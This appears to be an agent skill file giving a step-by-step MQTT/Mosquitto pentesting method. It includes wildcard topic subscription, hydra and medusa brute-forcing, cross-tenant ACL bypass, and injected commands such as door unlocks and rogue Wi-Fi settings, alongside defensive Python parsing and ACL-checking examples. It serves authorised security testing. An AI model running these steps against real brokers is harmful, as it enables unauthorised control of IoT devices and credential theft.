# MQTT Pentesting Skill

Skill `mqtt-pentesting` from the hacktricks-skills repository, file `skills/network-services-pentesting/1883-pentesting-mqtt-mosquitto/SKILL.md` (`git clone https://github.com/abelrguezr/hacktricks-skills`).

Skill description: Pentest MQTT (Mosquitto) services on port 1883 or non-standard ports. Use this skill whenever the user mentions MQTT, Mosquitto, IoT device testing, publish/subscribe protocols, or needs to enumerate and exploit MQTT brokers. This includes checking for authentication bypass, topic enumeration, ACL bypass, and plaintext credential exposure.

A comprehensive guide for pentesting MQTT (Mosquitto) services, commonly found in IoT environments.
## When to Use This Skill

Use this skill when:
- Port 1883 (or non-standard MQTT ports) is open on a target
- You need to enumerate MQTT topics and messages
- Testing IoT device communication protocols
- Checking for authentication bypass or weak ACLs
- Analyzing publish/subscribe message flows
- Looking for plaintext credential exposure
## Quick Start

```bash
# Subscribe to all topics on a broker
mosquitto_sub -h <host> -p <port> -t "#" -v

# Subscribe to system topics (single quotes: in double quotes the shell expands $SYS to nothing)
mosquitto_sub -h <host> -p <port> -t '$SYS/#' -v

# Publish a test message
mosquitto_pub -h <host> -p <port> -t "test/topic" -m "Hello World"
```
## Step 1: Service Discovery

### Identify MQTT Services

MQTT typically runs on port 1883, but IoT devices often use non-standard ports:

```bash
# Nmap scan for MQTT (the NSE script is mqtt-subscribe: it connects, subscribes and lists the topics it sees)
nmap -p 1883 --script mqtt-subscribe <target>

# Check for MQTT on common alternative ports
nmap -p 1883,8001,8883,8080,9001 <target>

# Shodan queries for reconnaissance
# port:1883 MQTT
# port:8001 MQTT
```
### Verify MQTT Protocol

Use Wireshark to confirm MQTT traffic on suspicious ports:
- Look for CONNECT/CONNACK packets
- Check for SUBSCRIBE/PUBLISH frames
- Note: MQTT is often plaintext (no TLS)
## Step 2: Connection Testing

### Test Anonymous Access

Many MQTT brokers allow unauthenticated connections:

```bash
# Try connecting without credentials (-d prints the CONNACK so you can read the return code)
mosquitto_sub -d -h <host> -p <port> -t "#" -v

# Check connection return codes
# 0x00 = Connection accepted
# 0x05 = Connection refused (not authorized)
```
### Use the MQTT Scanner Script

Run the bundled scanner to automate connection testing:

```bash
python scripts/mqtt_scanner.py --host <target> --port <port>
```

This script will:

- Attempt anonymous connection
- Subscribe to all topics (`#`)
- Subscribe to system topics (`$SYS/#`)
- Display received messages in real-time
## Step 3: Topic Enumeration

### Subscribe to Common Topics

```bash
# All topics
mosquitto_sub -h <host> -p <port> -t "#" -v

# System topics (broker info); single quotes keep the shell from expanding $SYS
mosquitto_sub -h <host> -p <port> -t '$SYS/#' -v

# Common IoT topic patterns
mosquitto_sub -h <host> -p <port> -t "home/#" -v
mosquitto_sub -h <host> -p <port> -t "device/#" -v
mosquitto_sub -h <host> -p <port> -t "sensor/#" -v
mosquitto_sub -h <host> -p <port> -t "control/#" -v
```
### IoT-Specific Topic Patterns

Consumer IoT platforms often use predictable topic structures:

```bash
# Gateway/hub device topics
mosquitto_sub -h <broker> -p <port> -t "/gateway/<deviceId>/#" -v

# App control topics
mosquitto_sub -h <broker> -p <port> -t "/app/<deviceId>/#" -v

# Admin/maintenance topics (may leak credentials)
mosquitto_sub -h <broker> -p <port> -t "/admin/#" -v
mosquitto_sub -h <broker> -p <port> -t "/config/#" -v
mosquitto_sub -h <broker> -p <port> -t "/sys/#" -v
```
## Step 4: Authentication Testing

### Brute-Force Credentials

If authentication is required, test common credentials:

```bash
# Using hydra for MQTT brute-force
hydra -l <username> -P <wordlist> <target> mqtt

# Using medusa
medusa -h <target> -u <username> -P <wordlist> -M mqtt
```

### Test with Known Credentials

```bash
mosquitto_sub -h <host> -p <port> -u <username> -P <password> -t "#" -v
```
## Step 5: ACL Bypass Testing

### Cross-Tenant Access

Test if you can access other tenants' devices:

```bash
# Publish to another device's topic
mosquitto_pub -h <broker> -p <port> \
  -u <username> -P <password> \
  -t "/tenant/<victimDeviceId>/tx" \
  -m '{"command":"power","value":"on"}'

# Subscribe to another tenant's topics
mosquitto_sub -h <broker> -p <port> \
  -u <username> -P <password> \
  -t "/tenant/<victimDeviceId>/#" -v
```

### Common ACL Bypass Patterns

```bash
# Try publishing to admin topics
mosquitto_pub -h <broker> -p <port> \
  -t "/admin/config" \
  -m '{"wifi_ssid":"evil","wifi_pass":"password"}'

# Try device control commands
mosquitto_pub -h <broker> -p <port> \
  -t "/device/<id>/control" \
  -m '{"method":"Device.setState","params":{"state":{"power":"on"}}}'
```
## Step 6: Message Injection

### Publish Test Messages

```bash
# Simple message
mosquitto_pub -h <host> -p <port> -t "test/topic" -m "Hello World"

# JSON payload
mosquitto_pub -h <host> -p <port> -t "device/control" \
  -m '{"action":"unlock","device":"door1"}'

# With QoS level
mosquitto_pub -h <host> -p <port> -t "topic" -m "message" -q 1
```

## MQTT Packet Types Reference

| Type | Code | Description |
|---|---|---|
| CONNECT | 1 | Client requests connection |
| CONNACK | 2 | Server acknowledges connection |
| PUBLISH | 3 | Send message |
| PUBACK | 4 | Acknowledge PUBLISH |
| SUBSCRIBE | 8 | Request to listen to topic |
| SUBACK | 9 | Acknowledge SUBSCRIBE |
| UNSUBSCRIBE | 10 | Stop receiving topic |
| DISCONNECT | 14 | Terminate connection |
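The CONNECT/CONNACK checks from Step 2 and the packet types above, as an added Python example that is not part of the skill: it parses captured MQTT 3.1.1 CONNECT and CONNACK bytes (the raw TCP payload, so no Wireshark dependency), flags a username/password that crossed a non-TLS port, and reports whether an anonymous CONNECT was accepted. The packet bytes and the client/user names are constructed samples.

```python
"""Parse MQTT 3.1.1 CONNECT/CONNACK packets from a capture (added example)."""

def _remaining_length(data, pos):
    """Decode the variable-length 'remaining length' field (1 to 4 bytes)."""
    value, mult = 0, 1
    while data[pos] & 0x80:
        value, mult, pos = value + (data[pos] & 0x7F) * mult, mult * 128, pos + 1
    return value + data[pos] * mult, pos + 1

def _field(data, pos):
    """Read one 2-byte big-endian length-prefixed field (string or binary)."""
    n = int.from_bytes(data[pos:pos + 2], "big")
    return data[pos + 2:pos + 2 + n], pos + 2 + n

def parse_connect(data):
    """Return client id, username and whether a password was present."""
    if data[0] >> 4 != 1:
        raise ValueError("not a CONNECT packet")
    _, pos = _remaining_length(data, 1)
    _, pos = _field(data, pos)            # protocol name, b"MQTT" for 3.1.1
    flags = data[pos + 1]                 # connect flags follow the level byte
    pos += 4                              # level, flags, 2-byte keep-alive
    client_id, pos = _field(data, pos)
    if flags & 0x04:                      # will flag set: skip will topic + message
        _, pos = _field(data, _field(data, pos)[1])
    user = pw = None
    if flags & 0x80:
        user, pos = _field(data, pos)
    if flags & 0x40:
        pw, pos = _field(data, pos)
    return {"client_id": client_id.decode(), "has_password": pw is not None,
            "username": None if user is None else user.decode()}

def audit_session(connect, connack, tls=False):
    """Findings for one CONNECT/CONNACK exchange plus the CONNACK return code."""
    client, code = parse_connect(connect), connack[3]   # byte 3 = return code
    findings = []
    if client["username"] is not None and not tls:      # port 1883: tls=False
        findings.append(f"credentials for '{client['username']}' sent in plaintext")
    if client["username"] is None and code == 0x00:
        findings.append(f"anonymous client '{client['client_id']}' accepted")
    return findings, code

# Constructed samples: a CONNECT carrying admin/s3cret for client "sensor-01",
# an anonymous CONNECT, and the two CONNACK codes the skill says to check.
CONNECT_WITH_CREDS = (b"\x10\x24\x00\x04MQTT\x04\xc2\x00\x3c"
                      b"\x00\x09sensor-01\x00\x05admin\x00\x06s3cret")
CONNECT_ANON = b"\x10\x15\x00\x04MQTT\x04\x02\x00\x3c\x00\x09sensor-01"
CONNACK_OK, CONNACK_NOT_AUTH = b"\x20\x02\x00\x00", b"\x20\x02\x00\x05"
```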
## Common Vulnerabilities

1. Plaintext Credentials
   - MQTT does not use encryption by default
   - Credentials sent in clear text
   - Use Wireshark to capture CONNECT packets
2. Missing Authentication
   - Many brokers allow anonymous access
   - Check return code 0x00 (accepted) vs 0x05 (refused)
3. Weak Topic ACLs
   - Topics namespaced only by deviceId
   - Any authenticated user can access all devices
   - Test cross-tenant access
4. Sensitive Data Leakage
   - Wi-Fi credentials in config topics
   - Device state information
   - User activity data
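An added Python example (not from the skill) of the broker-side check that closes the cross-tenant hole of Step 5 and the "Weak Topic ACLs" item: MQTT wildcard matching plus a tenant-scope rule that only allows a subscription filter when every topic it could match lies under the client's own `/tenant/<deviceId>` namespace, so `#` and `/tenant/+/tx` are refused. The namespace layout and the other-tenant topics are constructed assumptions.

```python
"""Tenant-scoped MQTT topic authorisation check (added example, not from the skill)."""

def topic_matches(topic_filter, topic):
    """MQTT 3.1.1 matching: '+' is one level, '#' is the remainder (last level only).
    A filter whose first level is a wildcard never matches a '$'-prefixed topic."""
    f, t = topic_filter.split("/"), topic.split("/")
    if topic.startswith("$") and f[0] in ("+", "#"):
        return False
    for i, level in enumerate(f):
        if level == "#":
            return i == len(f) - 1 and i <= len(t)
        if i >= len(t) or (level != "+" and level != t[i]):
            return False
    return len(f) == len(t)

def in_tenant_scope(topic_filter, device_id):
    """Allow a filter only if every topic it can match lies under /tenant/<device_id>.
    Whole levels are compared, so a prefix such as dev-01 cannot reach dev-010."""
    ns, levels = f"/tenant/{device_id}".split("/"), topic_filter.split("/")
    if "#" in levels[:-1] or any(("#" in lv or "+" in lv) and lv not in ("#", "+")
                                 for lv in levels):
        return False                      # malformed filter: reject outright
    return len(levels) >= len(ns) and levels[:len(ns)] == ns

def check_subscription(topic_filter, device_id, other_topics):
    """Decision for a SUBSCRIBE, plus the other tenants' topics the filter would reach."""
    reach = [t for t in other_topics if topic_matches(topic_filter, t)]
    return ("allow" if in_tenant_scope(topic_filter, device_id) else "deny"), reach

# Constructed topics belonging to another device and to the broker itself.
OTHER_TENANT_TOPICS = ["/tenant/dev-02/tx", "/tenant/dev-02/status",
                       "$SYS/broker/clients/connected"]
```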
## Tools

### Mosquitto Clients

```bash
apt-get install mosquitto mosquitto-clients
```

### Python MQTT Client

```bash
pip install paho-mqtt
```

### Additional Tools

## Reporting

Document findings with:
- Broker address and port
- Authentication status (open/required)
- Enumerated topics
- Sensitive data discovered
- ACL bypass capabilities
- Sample messages captured